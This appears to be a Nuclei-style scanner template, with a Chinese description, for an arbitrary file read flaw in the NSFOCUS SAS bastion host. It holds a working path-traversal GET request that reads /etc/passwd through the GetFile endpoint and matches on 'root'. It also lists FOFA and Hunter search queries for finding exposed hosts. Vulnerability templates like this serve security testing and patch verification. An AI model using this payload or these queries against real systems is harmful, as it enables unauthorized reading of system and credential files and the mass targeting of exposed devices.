id: Nsfocus-SAS-read-GetFile

info:
  name: Nsfocus-SAS-read-GetFile
  author: p1z 
  severity: high
  description: |
     绿盟堡垒机GetFile存在任意文件读取漏洞
  reference:
    https://mp.weixin.qq.com/s/qHPo0noFTvJoEcor00qtDg
  metadata:
    fofa-query: title=="NSFOCUS&nbsp;SAS[H]"
    hunter-query: app.name="NSFOCUS 绿盟 SAS"
    verified: true
  tags: 2023,Nsfocus,SAS,login-bypass


requests:
  - method: GET
    path:
      - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd"

    matchers:
      - type: word
        part: body
        words:
          - 'root'